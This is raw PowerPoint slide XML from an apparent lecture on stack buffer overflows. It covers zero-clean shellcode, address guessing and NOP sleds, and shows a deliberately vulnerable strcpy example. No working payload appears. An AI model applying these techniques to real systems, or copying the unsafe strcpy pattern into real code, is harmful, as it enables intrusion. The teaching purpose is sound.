              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty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	}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="112671672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80B28-762A-4585-AAB7-B3D74D5EE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to Writing Shellcode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C4327A-4CF3-428D-855D-C060D4E57A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Compiled shellcode often must be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zero-clean</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cannot contain any zero bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In C, strings are null (zero) terminated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() will stop if it encounters a zero while copying!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Shellcode must survive any changes made by the target program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What if the program decrypts the string before copying?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What if the program capitalizes lowercase letters?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Shellcode must be crafted to avoid or tolerate these changes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="71179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B3FD1-40EA-432C-A286-A9B673140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433196" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hitting the Target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CD840B-4B1D-4754-984C-B90D0160516D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9258574" y="365125"/>
            <a:ext cx="1256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Memory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369C03-1A8F-4186-9F55-472D98B5C2F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8567009" y="826790"/>
            <a:ext cx="0" cy="556305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CDC6264-C836-4FF5-9E0D-22D2C943BE57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11211377" y="826790"/>
            <a:ext cx="0" cy="556305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41F62BF2-F3FF-4D00-BE59-120561E20530}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8623892" y="1255059"/>
            <a:ext cx="2504140" cy="70522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argv</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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58FE83-725B-4D37-ABD4-021E0287CD35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8623892" y="2035939"/>
            <a:ext cx="2504140" cy="40246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argc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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88226CC-58DF-4A7F-BA11-36AF21EA00AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8623892" y="3521889"/>
            <a:ext cx="2504140" cy="286796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buffer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858E695-1AE5-40A2-81C6-A27A3CD39782}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8623892" y="2514057"/>
            <a:ext cx="2504140" cy="40246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IP = …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FC385A7-7B37-4C33-B4EA-D736063455BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8623892" y="3061224"/>
            <a:ext cx="2504140" cy="40246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IP = 7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18353E-2F42-4851-8167-95FED5933379}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8630335" y="3505484"/>
            <a:ext cx="2502734" cy="2884365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Shellcode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E3671EE-A5B5-43D3-AAD4-BDA09CDD7538}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8630335" y="3058115"/>
            <a:ext cx="2502734" cy="40557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IP = 856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30939EDD-8E4E-459C-88C8-D62F10A604C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11138105" y="1272987"/>
            <a:ext cx="874602" cy="69924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:1000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:996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3E336E1A-0130-4DBF-8E72-72BF8F9F2EF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11138105" y="2069979"/>
            <a:ext cx="874602" cy="3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:992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8E7C77BC-52DC-4838-ADEB-DC796A5EF88C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11138105" y="2564309"/>
            <a:ext cx="874602" cy="3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:988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C50640D3-06B7-4EAA-A236-7CB56E8025F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11138105" y="3074447"/>
            <a:ext cx="874602" cy="3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:984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934E9726-0761-439B-8098-6C16DBEA3C05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11138105" y="6108955"/>
            <a:ext cx="874602" cy="3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:856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E3BDB37-5876-47AD-BEB1-5C9A6F7CF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825625"/>
            <a:ext cx="6993670" cy="4564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Address of shellcode must be guessed exactly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Must jump to the precise start of the shellcode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However, stack addresses often change</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Change each time a program runs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Challenge: how can we reliably guess the address of the shellcode?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cheat!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make the target even bigger so it’s easier to hit ;)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079E5204-553D-4CCC-B42C-7E74189B7452}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7023253" y="2887774"/>
            <a:ext cx="1460411" cy="70820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8E6157CE-21ED-4136-9C67-4EA7F1339757}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11143142" y="1272987"/>
            <a:ext cx="874602" cy="69924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:900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:896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5647F92F-724F-4E81-B761-7742E68ED7C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11143142" y="2069979"/>
            <a:ext cx="874602" cy="3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:892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F70ECEAB-4A6C-4C73-80F3-2E74459DC83D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11143142" y="2564309"/>
            <a:ext cx="874602" cy="3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:888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D11AB444-FE27-4949-9C0E-EFD26342C370}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11143142" y="3074447"/>
            <a:ext cx="874602" cy="3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:884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93F73BA4-CA8F-40EE-AF41-F010A9F3CF52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11143142" y="6108955"/>
            <a:ext cx="874602" cy="3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:756</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="105631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9" grpId="0" animBg="1"/>
      <p:bldP spid="32" grpId="0"/>
      <p:bldP spid="33" grpId="0"/>
      <p:bldP spid="39" grpId="0"/>
      <p:bldP spid="40" grpId="0"/>
      <p:bldP spid="41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1B877-38F1-456F-89A4-7265B2148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Hit the Ski Slopes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B3B2D-888E-4264-B701-5C68160A95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Most CPUs support no-op instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Simple, one-byte instructions that don’t do anything</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On Intel x86, 0x90 is the NOP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Key idea: build a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NOP sled </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in front of the shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Acts as a big ramp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the instruction pointer lands anywhere on the ramp, it will execute NOPs until it hits the shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="215707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B3FD1-40EA-432C-A286-A9B673140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433196" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploit v2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B7E7A-4158-4A3A-9991-2A74F262C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8113" y="1825625"/>
            <a:ext cx="6384373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void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> print(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string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> s) {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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// only holds 128 characters, max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string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> buffer[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>128</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>];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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(buffer, s);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puts(buffer);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18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void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"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main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(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integer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin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</a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 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strings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin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</a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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print(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]);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2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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CD840B-4B1D-4754-984C-B90D0160516D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9258574" y="365125"/>
            <a:ext cx="1256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Memory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369C03-1A8F-4186-9F55-472D98B5C2F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8567009" y="826790"/>
            <a:ext cx="0" cy="556305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CDC6264-C836-4FF5-9E0D-22D2C943BE57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11211377" y="826790"/>
            <a:ext cx="0" cy="556305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D67E3C3-5953-4380-8F73-9F71921817FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="941781" y="1825625"/>
            <a:ext cx="702874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0:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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1: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2: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3:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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4: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5: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6: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7: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8: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5A080C8E-FFB2-4DB6-82F5-FE53CA42626B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250217" y="4159250"/>
            <a:ext cx="980105" cy="86512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F62BF2-F3FF-4D00-BE59-120561E20530}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8623892" y="1255059"/>
            <a:ext cx="2504140" cy="70522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argv</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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58FE83-725B-4D37-ABD4-021E0287CD35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8623892" y="2035939"/>
            <a:ext cx="2504140" cy="40246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argc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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88226CC-58DF-4A7F-BA11-36AF21EA00AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8623892" y="3521889"/>
            <a:ext cx="2504140" cy="286796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buffer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8DB585E-751C-4FDD-9A5B-A85F7B19DE3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7861254" y="2232839"/>
            <a:ext cx="621041" cy="931710"/>
            <a:chOff x="7973123" y="2159723"/>
            <a:chExt cx="621041" cy="1345461"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Left Bracket 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D8D45CC-5A52-493C-AB99-F7C144AE0D7B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8414872" y="2547880"/>
              <a:ext cx="179292" cy="698382"/>
            </a:xfrm>
            <a:prstGeom prst="leftBracket">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="5715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03EADBE-EC70-4A0C-8EB5-E410A92ACFC2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="7500447" y="2632399"/>
              <a:ext cx="13454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main()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A001156-8D8D-4DD5-9C0F-2A4C3E5C60C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7877104" y="3110809"/>
            <a:ext cx="605191" cy="3279040"/>
            <a:chOff x="7988973" y="2547879"/>
            <a:chExt cx="605191" cy="1209717"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Left Bracket 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FADA7FCB-6917-4578-8649-A15085371812}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8414872" y="2547879"/>
              <a:ext cx="179292" cy="1209717"/>
            </a:xfrm>
            <a:prstGeom prst="leftBracket">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="5715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BBB9F7A-3E34-4926-B407-BB1A4EBDC88D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="7886815" y="2778499"/>
              <a:ext cx="6044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print()</a:t>
              </a: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7858E695-1AE5-40A2-81C6-A27A3CD39782}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8623892" y="2514057"/>
            <a:ext cx="2504140" cy="40246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IP = …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FC385A7-7B37-4C33-B4EA-D736063455BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8623892" y="3061224"/>
            <a:ext cx="2504140" cy="40246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IP = 7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18353E-2F42-4851-8167-95FED5933379}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8624595" y="3521889"/>
            <a:ext cx="2502734" cy="78117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Malicious code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E3671EE-A5B5-43D3-AAD4-BDA09CDD7538}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8630335" y="3058115"/>
            <a:ext cx="2502734" cy="40557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IP = 900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30939EDD-8E4E-459C-88C8-D62F10A604C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11138105" y="1272987"/>
            <a:ext cx="874602" cy="69924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:1000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:996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3E336E1A-0130-4DBF-8E72-72BF8F9F2EF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11138105" y="2069979"/>
            <a:ext cx="874602" cy="3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:992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8E7C77BC-52DC-4838-ADEB-DC796A5EF88C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11138105" y="2564309"/>
            <a:ext cx="874602" cy="3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:988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C50640D3-06B7-4EAA-A236-7CB56E8025F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11138105" y="3074447"/>
            <a:ext cx="874602" cy="3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:984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934E9726-0761-439B-8098-6C16DBEA3C05}"/>
              </a:ext>
            </a:extLst>
